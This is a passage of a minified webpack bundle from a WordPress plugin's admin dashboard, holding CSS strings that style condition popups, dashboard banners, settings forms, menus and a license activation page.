10px;align-items:center}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-condition-text .ultp-condition-arrow{font-size:15px;display:inline-block;padding-left:15px;line-height:1.5}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown span{cursor:pointer}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-dropdown-value__close{color:#fff;background:#000;margin-left:8px;border-radius:50%;font-size:14px;line-height:1;height:auto;width:auto}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__default{width:100%;display:block;padding:12px 0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__content{width:100%;display:flex;align-items:center;justify-content:space-between}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__content .ultp-condition-arrow{top:3px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search{background:#fff;position:absolute;left:0;z-index:1;top:39px;width:100%;padding:10px;border-radius:0;box-sizing:border-box;border:1px solid #eaedf2}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search input{width:100%;border-radius:2px;min-height:34px;border:1px solid #eaedf2}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search li{cursor:pointer;text-align:left;margin-bottom:12px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search li:last-child{margin-bottom:0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-save-condition{width:100%;font-size:14px;position:sticky;bottom:0;color:#fff;border-radius:4px;padding:15px;border:none;cursor:pointer;background-image:linear-gradient(#399aff, #016cdb)}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-save-condition span{font-size:17px;margin-left:4px;color:#fff}.ultp-builder-items .ultp-premade-img__blank{height:100%;display:flex;align-items:center;justify-content:center;padding:20px}.ultp-premade-img__blank img{max-height:395px}.ultp-list-blank-img img{opacity:.1}.ultp-list-blank-img a{text-decoration:none !important}@media only screen and (max-width: 1100px){.ultp-builder-dashboard__content{gap:20px;grid-template-columns:auto}.ultp-builder-dashboard__content .ultp-builder-tab__option{min-width:300px;width:fit-content;min-height:fit-content}.ultp-builder-tab__content .ultp-builder-items{grid-template-columns:1fr 1fr}}.ultp-builder-create-btn{text-transform:capitalize}",""]);const l=i},5735:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'@media only screen and (max-width: 1350px){.ultp-menu-items div{margin:0px 10px 0 0}}@media only screen and (max-width: 1250px){.ultp-menu-items div a:after{bottom:-2px;height:2px}}.dash-faq-container{min-width:170px}.dash-faq-container a{text-decoration:none;font-size:14px;color:#575a5d;display:flex;gap:8px;align-items:center;width:-webkit-fill-available;padding-right:32px}.dash-faq-container a:focus{box-shadow:none}.dash-faq-container a .dashicons{padding-top:2px}.dash-faq-container a:hover{color:var(--postx-primary-color)}.dash-faq-container{display:flex;flex-direction:column;gap:15px;padding:25px;position:absolute;right:20px;top:70px;border-radius:2px;box-shadow:0 2px 4px 0 rgba(8,68,129,.2);background-color:#fff;z-index:1}.dash-faq-container::before{content:"";content:"";position:absolute;right:0px;top:-29px;font:normal 42px dashicons;color:#fff}.ultp-dashboard-container-grid{display:grid;grid-template-columns:auto 424px;gap:32px}@media only screen and (max-width: 1250px){.ultp-dashboard-container-grid{display:flex;flex-direction:column}}@media only screen and (max-width: 1250px){.ultp-dashboard-container-grid{display:flex;flex-direction:column}}.ultp-dashboard-container-grid .ultp-dashboard-content{display:flex;gap:32px;flex-direction:column}.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-banner,.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-pro-promo,.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-blocks{padding:32px}.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-item-con{box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863)}.ultp-dash-banner{padding:32px;display:flex;gap:80px;justify-content:space-between}@media screen and (max-width: 758px){.ultp-dash-banner{padding:16px;flex-direction:column-reverse;gap:8px;width:fit-content}}.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-title{font-weight:600;font-size:24px;line-height:32px;color:#070707}@media screen and (max-width: 768px){.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-title{font-size:18px;display:inline-block}}.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-description{max-width:365px;font-size:16px;line-height:24px;color:#41474e;margin-top:14px}.ultp-dash-banner .ultp-dash-banner-left .ultp-primary-alter-button{padding:10px 24px;margin-top:32px}.ultp-dash-banner .ultp-dash-banner-right{width:352px}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img{position:relative}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img img{max-width:100%}@keyframes pulse-border{0%{box-shadow:0 0 0 5px rgba(241,19,108,.6)}70%{box-shadow:0 0 0 15px rgba(255,67,142,0)}100%{box-shadow:0 0 0 5px rgba(255,67,142,0)}}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img .ultp-dash-banner-right-play-button{cursor:pointer;width:64px;height:64px;border-radius:50%;background-color:#fff;display:flex;align-items:center;justify-content:center;position:absolute;top:50%;right:50%;transform:translate(50%, -50%);animation:pulse-border 1.2s ease-in infinite}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img .ultp-dash-banner-right-play-button svg{width:24px;height:24px;color:#070707;margin-top:-1px;margin-left:1px}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-video{width:352px;height:240px;border-radius:8px;overflow:hidden;box-shadow:0px 0px 42.67px 0px rgba(212,212,221,.4784313725)}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-video iframe{width:100%;height:100%}.ultp-dash-pro-promo{padding:32px;background-color:#fff;display:flex;gap:80px;justify-content:space-between}@media only screen and (max-width: 1400px){.ultp-dash-pro-promo{flex-direction:column-reverse;gap:24px}}@media only screen and (max-width: 758px){.ultp-dash-pro-promo{flex-direction:column-reverse;gap:24px;padding:16px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-title{font-weight:600;font-size:24px;line-height:32px;color:#070707}@media only screen and (max-width: 1250px){.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-title{font-size:18px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-description{max-width:365px;font-size:16px;line-height:24px;color:#41474e;margin-top:14px}@media only screen and (max-width: 1250px){.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-description{font-size:14px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-primary-alter-button{margin-top:32px}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature{display:flex;column-gap:24px;row-gap:12px;flex-wrap:wrap;margin-top:24px}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature .ultp-dash-pro-promo-left-keyfeature-item{display:flex;align-items:center;gap:6px;font-weight:500;font-size:14px;line-height:20px;color:#070707}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature .ultp-dash-pro-promo-left-keyfeature-item svg{width:20px;height:20px;color:#1f66ff}.ultp-dash-pro-promo .ultp-dash-pro-promo-right-img{max-width:352px;object-fit:contain}.ultp-dash-blocks{padding:32px}@media only screen and (max-width: 1250px){.ultp-dash-blocks{padding:16px}}.ultp-dash-blocks .ultp-dash-blocks-heading{display:flex;justify-content:space-between;align-items:center;margin-bottom:24px}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-dash-blocks-heading-title{font-weight:600;font-size:18px;line-height:24px;color:#0a0d14}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-transparent-button{color:#1f66ff !important}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-transparent-button svg{fill:#1f66ff !important;width:20px;height:20px}.ultp-dash-blocks .ultp-dash-blocks-items{display:grid;grid-template-columns:1fr 1fr 1fr;gap:16px}@media only screen and (max-width: 1500px){.ultp-dash-blocks .ultp-dash-blocks-items{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 1250px){.ultp-dash-blocks .ultp-dash-blocks-items{grid-template-columns:1fr}}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-dash-blocks-item{display:flex;gap:8px;align-items:center;justify-content:space-between;border:1px solid #e6e6e6;border-radius:8px;background:#fbfbfb;box-shadow:none}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta{display:flex;align-items:center;gap:8px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta .ultp-blocks-item-icon{width:24px;height:24px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta .ultp-blocks-item-title{font-weight:500;font-size:14px;line-height:20px;color:#2e2e2e}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-control-option{display:flex;align-items:center;gap:8px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-control-option .ultp-option-tooltip{font-size:12px;line-height:16px;color:#6e6e6e;text-decoration:none}',""]);const l=i},9455:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-dashboard-general-settings-container{display:grid;grid-template-columns:auto 360px;gap:32px}.ultp-dashboard-general-settings-container .ultp-general-settings{height:fit-content;width:-webkit-fill-available;padding:32px}.ultp-dashboard-general-settings-container .ultp-general-settings form{margin-top:40px}.ultp-dashboard-general-settings-container .ultp-general-settings .skeletonOverflow{display:flex;gap:30px;flex-direction:column;margin-top:40px}.ultp-dashboard-general-settings-container .ultp-general-settings .onloading{cursor:no-drop}.ultp-dashboard-general-settings-container .ultp-general-settings .onloading svg{height:14px;width:14px;vertical-align:middle;margin-left:4px;animation:ultp-spin 1s linear infinite;color:#fff}@media only screen and (max-width: 1100px){.ultp-dashboard-general-settings-container{grid-template-columns:auto;justify-items:center}.ultp-dashboard-general-settings-container .ultp-general-settings-content-right{width:360px}}@media only screen and (max-width: 768px){.ultp-dashboard-general-settings-container .ultp-general-settings-content-right{width:100%}}",""]);const l=i},886:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-setting-hellobar{background:#037fff;padding:6px 0;text-align:center;color:rgba(255,255,255,.85);font-size:14px}.ultp-setting-hellobar a{margin-left:4px;font-weight:700;font-size:14px;color:#fff}.ultp-setting-hellobar strong{color:#fff;font-weight:700}.ultp-ring{-webkit-animation:ring 4s .7s ease-in-out infinite;-moz-animation:ring 4s .7s ease-in-out infinite;animation:ring 4s .7s ease-in-out infinite;margin-right:5px;font-size:20px;position:relative;top:2px;color:#fff}.helobarClose{position:absolute;cursor:pointer;right:15px}.helobarClose svg{height:16px;color:#fff}@keyframes ring{0%{transform:rotate(0)}1%{transform:rotate(30deg)}3%{transform:rotate(-28deg)}5%{transform:rotate(34deg)}7%{transform:rotate(-32deg)}9%{transform:rotate(30deg)}11%{transform:rotate(-28deg)}13%{transform:rotate(26deg)}15%{transform:rotate(-24deg)}17%{transform:rotate(22deg)}19%{transform:rotate(-20deg)}21%{transform:rotate(18deg)}23%{transform:rotate(-16deg)}25%{transform:rotate(14deg)}27%{transform:rotate(-12deg)}29%{transform:rotate(10deg)}31%{transform:rotate(-8deg)}33%{transform:rotate(6deg)}35%{transform:rotate(-4deg)}37%{transform:rotate(2deg)}39%{transform:rotate(-1deg)}41%{transform:rotate(1deg)}43%{transform:rotate(0)}100%{transform:rotate(0)}}",""]);const l=i},283:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp_h1{font-size:var(--postx-h1-fontsize);font-weight:var(--postx-h1-weight)}.ultp_h2{font-size:var(--postx-h2-fontsize);font-weight:var(--postx-h2-weight)}.ultp_h3{font-size:var(--postx-h3-fontsize);font-weight:var(--postx-h3-weight)}.ultp_h4{font-size:var(--postx-h4-fontsize);font-weight:var(--postx-h4-weight)}.ultp_h5{font-size:var(--postx-h5-fontsize);font-weight:var(--postx-h5-weight)}.ultp_h6{font-size:var(--postx-h6-fontsize);font-weight:var(--postx-h6-weight)}.ultp_h1,.ultp_h2,.ultp_h3,.ultp_h4,.ultp_h5,.ultp_h6{color:#091f36}.ultp-settings-container{margin:0 !important;background:#f6f8fa;padding:32px;min-height:100vh;height:100%}.ultp-settings-container .ultp-settings-content .ultp-premade-grid{background:#f6f8fa}@media screen and (max-width: 1250px){.ultp-settings-container{padding:12px}}.ultp-settings-content{margin:0 auto 40px !important;max-width:1376px}@media screen and (max-width: 768px){.ultp-settings-content{max-width:100%;overflow:scroll}}.ultp-dash-item-con{background:#fff;padding:12px;border-radius:8px;box-shadow:0 2px 4px 0 rgba(27,28,29,.0392156863)}.ultp-setting-header{display:grid;align-items:center;grid-template-columns:148px 502px auto 72px;gap:16px;background:var(--postx-white-color);border-bottom:1px solid var(--postx-border-color);padding:0 32px;position:sticky;top:32px;width:100%;height:67px;min-height:67px;box-sizing:border-box;z-index:99}@media screen and (max-width: 1200px){.ultp-setting-header{grid-template-columns:152px auto;background-color:#fff;gap:32px;height:auto;padding-top:12px;column-gap:38px;box-shadow:0px 0px 11px rgba(0,0,0,.168627451)}}@media screen and (max-width: 768px){.ultp-setting-header{display:flex;flex-wrap:wrap;padding:8px;height:auto}}.ultp-setting-hellobar{position:relative;background:#027fff;padding:6px 0;text-align:center;color:rgba(255,255,255,.85);font-size:14px}.ultp-setting-hellobar a{margin-left:4px;font-weight:700;color:#fff}.ultp-setting-hellobar strong{color:#fff}.helobarClose{position:absolute;top:50%;right:15px;transform:translateY(-50%);cursor:pointer}.helobarClose svg{height:10px;color:rgba(255,255,255,.43)}.ultp-pro-feature-lists{display:flex;flex-direction:column;gap:15px;margin-top:24px}.ultp-pro-feature-lists>span{display:inline-flex;gap:8px;align-items:center}.ultp-pro-feature-lists>span,.ultp-pro-feature-lists>span>span{color:#070707;font-weight:500;font-size:14px;line-height:20px}.ultp-pro-feature-lists>span>span>a{text-decoration:none}.ultp-pro-feature-lists>span>span>a .dashicons{color:var(--postx-primary-color);font-size:17px;line-height:1.2}.ultp-pro-feature-lists>span svg{height:16px;width:16px;vertical-align:middle;color:#070707;flex-shrink:0}.settingsLink{color:var(--postx-primary-color) !important}.ultp-ring{display:inline-block;margin-right:5px;font-size:20px;position:relative;top:2px;color:#fff;animation:ring 2s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite}@keyframes ring{0%{transform:rotate(0)}5%{transform:rotate(25deg)}10%{transform:rotate(-20deg)}15%{transform:rotate(12deg)}20%{transform:rotate(-6deg)}25%{transform:rotate(2deg)}28%,100%{transform:rotate(0)}}#postx-regenerate-css{display:none;margin-top:10px}#postx-regenerate-css span{color:var(--postx-white-color)}#postx-regenerate-css.active{display:inline-block}#postx-regenerate-css .dashicons{display:none;margin-right:8px;-webkit-animation:ultp-spin 1s linear infinite;animation:ultp-spin 1s linear infinite}#postx-regenerate-css.ultp-spinner .dashicons{display:inline-block}@keyframes ultp-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}form .ultp-settings-wrap{display:flex;flex-direction:column;gap:12px;margin-bottom:30px}form .ultp-settings-wrap strong{font-size:14px;color:#091f36;font-weight:500}form .ultp-settings-wrap .ultp-settings-field-wrap select,form .ultp-settings-wrap .ultp-settings-field-wrap input[type=text],form .ultp-settings-wrap .ultp-settings-field-wrap input[type=number]{height:36px;width:100%;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:0px 13px 0px;background-color:#fff;margin-bottom:3px}form .ultp-settings-wrap .ultp-settings-field-wrap textarea{width:100%;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:0px 13px 0px;background-color:#fff;margin-bottom:3px}form .ultp-settings-wrap .ultp-settings-field-wrap select[multiple]{max-height:100px;height:100%}form .ultp-settings-wrap .ultp-settings-field-wrap .ultp-description{font-size:12px}form .ultp-data-message{display:none;position:fixed;bottom:10%;padding:13px 14px 14px 15px;border-radius:4px;box-shadow:0 1px 2px 0 rgba(8,68,129,.2);background:rgba(115,184,28,.1);width:224px;color:#091f36}.ultp-upgrade-pro-btn{display:inline-block;padding:10px 25px;color:#fff;font-size:14px;background:linear-gradient(180deg, #ff9336, transparent) #de521e;border-radius:4px;text-decoration:none;width:fit-content;transition:background-color 400ms}.ultp-upgrade-pro-btn:hover{background-color:#ff9336;color:#fff}.ultp-upgrade-pro-btn:focus{outline:0;box-shadow:none}.ultp-upgrade-pro-btn:active{color:#fff}input[type=checkbox]{width:22px;height:20px;border-radius:2px;border:solid 1px #eaedf2;background:#fff;position:relative;margin:0;box-shadow:none;display:inline-block}input[type=checkbox]+.ultp-description{margin-left:10px}input[type=checkbox]:checked{background:var(--postx-primary-color);border:none}input[type=checkbox]:checked::before{content:"✓";color:#fff;height:unset;width:unset;margin:unset;position:absolute;left:5px;top:9px;font-weight:900}.ultp-primary-button{cursor:pointer;padding:12px 25px;color:#fff !important;font-size:14px;background:#070707;border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;border:none;transition:background-color 400ms;gap:8px;line-height:20px}.ultp-primary-button:hover{background-color:var(--postx-primary-color)}.ultp-primary-button:focus{outline:0;box-shadow:none}.ultp-secondary-button{cursor:pointer;padding:10px 25px;color:#070707;font-size:14px;background:rgba(0,0,0,0);border-radius:4px;text-decoration:none;border:1px solid #070707;display:inline-flex;align-items:center;width:fit-content;transition:background-color 400ms}.ultp-secondary-button:hover{background-color:#dee5fa}.ultp-secondary-button:focus{outline:0;box-shadow:none}.ultp-primary-alter-button{cursor:pointer;padding:12px 24px;color:#fff !important;font-size:14px;background:var(--postx-primary-color);border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;border:none;transition:background-color 400ms;gap:8px;line-height:20px}.ultp-primary-alter-button:hover{background-color:#070707}.ultp-primary-alter-button:focus{outline:0;box-shadow:none}.ultp-transparent-button{cursor:pointer;color:#a1a1a1 !important;font-size:14px;background:rgba(0,0,0,0);border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;transition:background-color 400ms;gap:8px}.ultp-transparent-button:hover{text-decoration:underline}.ultp-transparent-button:focus{outline:0;box-shadow:none}.ultp-transparent-alter-button{cursor:pointer;color:#4a4a4a;font-size:14px;background:rgba(0,0,0,0);text-decoration:underline;display:flex;align-items:center;width:fit-content;transition:background-color 400ms;gap:8px}.ultp-transparent-alter-button:hover{color:#3c3c3c}.ultp-transparent-alter-button:focus{outline:0;box-shadow:none}.ultp-primary-button svg,.ultp-primary-alter-button svg,.ultp-secondary-button svg,.ultp-transparent-button svg,.ultp-transparent-alter-button svg{width:24px;height:24px}.cursor{cursor:pointer}#wpbody-content:has(.ultp-menu-items-wrap){padding:0 !important;background-color:#f6f8fa}.ultp-menu-items-wrap{line-height:1.6}.ultp-menu-items-wrap h1,.ultp-menu-items-wrap h2,.ultp-menu-items-wrap h3,.ultp-menu-items-wrap h4,.ultp-menu-items-wrap h5,.ultp-menu-items-wrap h6{padding:0;margin:0}.ultp-menu-items-wrap .ultp-discount-wrap{transform:rotate(-90deg);width:150px;height:40px;display:flex;gap:10px;align-items:center;justify-content:center;border-radius:4px 4px 0 0;position:fixed;top:200px;right:-55px;z-index:99999;text-decoration:none;background:linear-gradient(60deg, hsl(224, 88%, 61%), hsl(359, 85%, 66%), hsl(44, 74%, 55%), hsl(89, 72%, 47%), hsl(114, 79%, 48%), hsl(179, 85%, 66%));background-size:300% 300%;background-position:0 50%;animation:ultp_moveGradient 4s alternate infinite;transition:.4s}.ultp-menu-items-wrap .ultp-discount-wrap .ultp-discount-text{font-weight:600;color:#fff;text-transform:uppercase;font-size:14px}@keyframes ultp_moveGradient{50%{background-position:100% 50%}}.ultp-ml-auto{margin-left:auto}.ultp-dash-control-options .ultp-addons-enable,.ultp-dash-control-options .ultp-blocks-enable{width:0;height:0;display:none}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label{position:relative;background-color:var(--postx-primary-color);opacity:unset}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label>span,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label>span{display:none}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label::after,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label::after{left:calc(100% - 3px);transform:translateX(-100%)}.ultp-dash-control-options .ultp-addons-enable.disabled+.ultp-control__label,.ultp-dash-control-options .ultp-blocks-enable.disabled+.ultp-control__label{opacity:.25 !important}.ultp-dash-control-options>label{width:36px;height:18px;display:block;cursor:pointer;border-radius:100px;text-indent:-9999px;background:#d2d2d2;opacity:1;position:relative}.ultp-dash-control-options>label::after{content:"";position:absolute;top:3px;left:3px;width:12px;height:12px;border-radius:90px;background:var(--postx-white-color);transition:.3s}.rotate{animation:rotate 1.5s linear infinite}@keyframes rotate{to{transform:rotate(360deg)}}.ultp-setting-logo{display:flex;gap:4px;align-items:center;border-right:1px solid #e2e4e9;height:100%;width:100%;max-width:152px}@media screen and (max-width: 1300px){.ultp-setting-logo{padding-right:11px}}@media screen and (max-width: 768px){.ultp-setting-logo{border-right:none}}.ultp-setting-logo .ultp-setting-header-img{height:26px}.ultp-setting-logo .ultp-setting-version{font-size:14px;border:1px solid var(--postx-primary-color);border-radius:100px;padding:7px 11px;background:#edf6ff;color:var(--postx-primary-color);line-height:18px;font-weight:500}.ultp-menu-items{display:flex;gap:24px}@media screen and (max-width: 1200px){.ultp-menu-items{margin-top:-9px}}@media screen and (max-width: 768px){.ultp-menu-items{flex-wrap:wrap;gap:16px}}.ultp-menu-item{position:relative;text-decoration:none;font-size:14px;padding:0;color:#070707;position:relative;display:flex;gap:8px;font-weight:500;align-items:center;transition:400ms;white-space:nowrap}.ultp-menu-item:hover{color:#1f66ff}.ultp-menu-item:focus{outline:none;box-shadow:none}.ultp-menu-item:after{content:"";position:absolute;bottom:-21px;width:100%;height:2px;background:var(--postx-primary-color);left:0;opacity:0}@media only screen and (max-width: 1250px){.ultp-menu-item:after{bottom:-9px}}.ultp-menu-item svg{width:20px;height:20px;color:#1f66ff}.ultp-menu-item.current{color:var(--postx-primary-color)}.ultp-menu-item.current:after{opacity:1}.ultp-menu-item .ultp-menu-item-tag{position:absolute;top:-14px;right:-20px;background:#fdedf0;border-radius:100px;padding:2px 6px;font-size:10px;font-weight:500;color:#dc2671;animation:ultpMenuTagColor 2s ease-in-out infinite}@keyframes ultpMenuTagColor{0%{background-color:#f8d7dd}50%{background-color:#fdedf0}100%{background-color:#f8d7dd}}.ultp-menu-items div a:active,.ultp-menu-items div a:focus{outline:none;box-shadow:none;border:none}.ultp-secondary-menu{display:flex;align-items:center;gap:8px;justify-content:space-between;padding:12px 0 12px 16px;border-left:1px solid var(--postx-border-color);height:-webkit-fill-available}@media screen and (max-width: 1300px){.ultp-secondary-menu{padding-left:0px !important;width:fit-content;border:0px !important}}@media screen and (max-width: 768px){.ultp-secondary-menu{border-left:none;padding:0}}.ultp-secondary-menu .ultp-pro-button{background-color:#edf6ff;color:#1f66ff !important;border:1px solid #1f66ff;padding:8px 20px;font-weight:500;font-size:16px;text-wrap:nowrap;display:flex;align-items:center;gap:8px}@media screen and (max-width: 768px){.ultp-secondary-menu .ultp-pro-button{padding:4px 8px}}.ultp-secondary-menu .ultp-pro-button svg{width:24px;height:24px;color:#1f66ff}.ultp-secondary-menu .ultp-pro-button:hover{background-color:#1f66ff;color:#fff !important}.ultp-secondary-menu .ultp-pro-button:hover svg{color:#fff}ul:has(.ultp-dash-faq-icon){position:relative}.ultp-dash-faq-con{height:100%;border-left:1px solid var(--postx-border-color);display:flex;align-items:center;justify-content:center;position:relative}@media screen and (max-width: 1200px){.ultp-dash-faq-con{width:fit-content;margin-left:0px !important;padding-left:2%}}@media screen and (max-width: 768px){.ultp-dash-faq-con{border-left:none;margin:0px;position:relative}}.ultp-dash-faq-icon{height:auto;width:auto;font-size:35px;cursor:pointer}.ultp-ms-container{position:relative}.ultp-ms-container .ultp-ms-results-con{min-height:30px;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:8px 14px;background-color:#fff;margin-bottom:3px;display:flex;gap:10px;justify-content:space-between}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results{display:flex;gap:8px;flex-wrap:wrap}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected{padding:4px 8px;border-radius:2px;background-color:#7c8084;color:#fff;display:inline-flex;align-items:center;gap:6px}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove{height:16px;width:14px}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove:hover svg{color:var(--postx-primary-color)}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove svg{color:#fff}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results-collapse{height:12px;width:12px;display:inline-block}.ultp-ms-container .ultp-ms-options{display:flex;flex-direction:column;gap:5px;z-index:1;position:absolute;width:100%;box-sizing:border-box;margin-top:4px;border:1px solid #eaedf2;box-shadow:0 1px 2px 0 rgba(8,68,129,.2);border-radius:4px;color:#000;padding:8px 14px;background-color:#fff;margin-bottom:3px}.ultp-ms-container .ultp-ms-options .ultp-ms-option{padding:4px 8px;border-radius:2px}.ultp-ms-container .ultp-ms-options .ultp-ms-option:hover{background-color:#7c8084;color:#fff}.ultp-field-radio .ultp-field-radio-items{display:flex;gap:20px;flex-wrap:wrap}.ultp-field-radio .ultp-field-radio-items input[type=radio]:checked::before{background-color:var(--postx-primary-color)}.ultp-sidebar-features{display:flex;flex-direction:column;gap:32px}.ultp-sidebar-card-item{border-radius:8px;padding:24px;display:flex;flex-direction:column;box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863);background-color:#fff}@media only screen and (max-width: 1250px){.ultp-sidebar-card-item{padding:16px}}.ultp-sidebar-card-item:has(.ultp-sidebar-card-title) img{margin-bottom:20px}.ultp-sidebar-card-item .ultp-sidebar-card-title{font-weight:600;font-size:18px;line-height:24px;color:#0a0d14}.ultp-sidebar-card-item .ultp-sidebar-card-description{font-size:14px;line-height:20px;color:#4a4a4a;margin-top:16px}.ultp-sidebar-card-item .ultp-primary-button,.ultp-sidebar-card-item .ultp-secondary-button,.ultp-sidebar-card-item .ultp-primary-alter-button,.ultp-sidebar-card-item .ultp-transparent-alter-button{padding:10px 24px;display:flex;align-items:center;gap:8px;margin-top:20px}.ultp-sidebar-card-item .ultp-primary-button svg,.ultp-sidebar-card-item .ultp-secondary-button svg,.ultp-sidebar-card-item .ultp-primary-alter-button svg,.ultp-sidebar-card-item .ultp-transparent-alter-button svg{width:20px;height:20px}.ultp-sidebar-card-item .ultp-sidebar-card-buttons{margin-top:24px}.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-primary-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-secondary-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-primary-alter-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-transparent-alter-button{margin-top:0}.ultp-sidebar-card-item .ultp-sidebar-card-links{display:flex;gap:16px;flex-direction:column;margin-top:24px}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link{text-decoration:none;color:#000;font-size:16px;font-weight:400;display:flex;align-items:center;gap:12px;line-height:normal}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link:hover{text-decoration:underline}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link span{display:flex}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link svg{width:24px;height:24px;color:#1f66ff}.ultp-sidebar-card-item .ultp-sidebar-card-buttons{display:flex;gap:20px;align-items:center}',""]);const l=i},4421:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp-license{--brand-color: #037fff;--brand-color-fade: #f0f7ff;max-width:1600px;padding:32px !important;display:flex;margin:0 auto !important;gap:32px}.ultp-license__activation{background-color:#fff;padding:32px !important;box-shadow:0px 2px 4px 0px rgba(91,95,88,.078);max-width:890px;width:60%}.ultp-license__title{margin-bottom:32px !important;color:#000;font-size:24px;line-height:1.2em;font-weight:600}.ultp-license__form{margin-bottom:30px !important}.ultp-license__form input{width:100%;padding:0 8px;color:#000 !important;border-radius:4px !important;max-height:40px !important;border-color:currentColor !important}.ultp-license__helper-text{font-size:12px;color:#80837f;margin-top:8px !important}.ultp-license__renew-link{display:flex;align-items:center;gap:6px;color:#fff;background-color:#f17b2c;border-radius:6px;box-shadow:none;padding:4px 